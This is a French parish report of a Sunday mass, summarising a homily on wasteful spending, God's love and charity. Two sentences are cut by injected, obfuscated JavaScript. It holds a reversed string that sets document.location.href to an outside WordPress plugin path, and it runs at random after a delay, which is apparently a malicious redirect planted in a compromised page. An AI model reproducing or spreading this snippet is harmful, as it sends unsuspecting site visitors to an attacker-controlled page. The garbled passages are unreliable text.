Dix-huitième dimanche du temps ordinaire
La sainte messe de 9h 30 de ce dimanche, le 02 août 2020, été célébrée par le Père Herménégilde Coyitungiye et concélébrée par le Père Longin NTIRANYIBAGIRA. Nous avons eu la joie d’écouter la Parole de Dieu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont la première lecture a été tirée du livre du prophète Isaïe 55,1-3, la deuxième lecture de la lettre de saint Paul apôtre aux Romains et enfin l’évangile de Jésus christ selon saint Mathieu.
Dans son homélie, le Père Herménégilde a montré comment Dieu est amour à travers la parabole burundaise « ntawumenya ibiri mu nda y’ingoma atari uwayikanye ». Ceci pour dire que c’est Dieu qui connaît l’homme qu’il a créé, ses forces et ses faiblesses, puisque sa parole le dit clairement qu’il connait même le nombre de ses cheveux sur sa tête.
Après cette brève introduction, le célébrant a divisé son enseignement en trois étapes : dans la première, il évoquait la question de pourquoi nous dépensons l’argent dans les futilités. Comme on venait de l’entendre dans la première lecture (pourquoi vous dépensez votre argent pour ce qui ne vous nourrit pas, vous fatigue pour ce qui ne rassasie pas), chacun d’entre nous devrait penser combien de fois il a dépensé son argent pour de choses inutiles.
Il a rappelé aux jeunes combien de fois ils utilisent de l’argent pour les choses sans importance notamment pour s’acheter de la drogue, pour activer des mégas afin de se connecter sur internet jour et nuit dans le seul but de visualiser des films malsains. Ici, il a tenu à préciser que parfois cet argent est volé. Se penchant du côté des parents notamment les pères des familles, il a montré comment ils gaspillent de l’argent dans la polygamie et aussi dans l’adultère. Ces choses ne rassasient jamais, a-t-il poursuivi. Il a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné ici comme exemple l’histoire de saint Jean Baptiste qui a été guillotiné par le roi Hérode pour avoir interdit au roi d’épouser Hérodiade, la femme de son frère. Sans oublier l’argent dépensé chez les marabouts, les astuces de beauté, les achats de produits cosmétiques pour les femmes en oubliant qu’elles ont été créées en l’image de notre Seigneur.
Dans la seconde étape, le Père COYITUNGIYE s’est beaucoup borné sur la parole de Dieu tirée dans la seconde lecture (qu’est-ce qui nous séparera de l’amour du christ?) qui montre que s’attacher à Jésus Christ signifie suivre ses pas et que le trahir à cause de ces choses inutiles nous sépare de l’amour de Dieu. Souvent nous nous éloignons de son Amour alors que notre Dieu est Miséricordieux et Compatissant et nous guide malgré nos péchés de s’attacher au monde qui passe.
Enfin, dans la troisième étape, le Recteur du Sanctuaire a montré comment l’Evangile nous invite à contribuer dans la rédemption de ces âmes perdues que nous devrions dispenser d’amour, de joie et des biens pour rassasier leurs âmes. Que la Vierge Marie soit notre modèle afin de devenir des hommes qui témoignent de l’amour de Dieu le Père.
Ingrid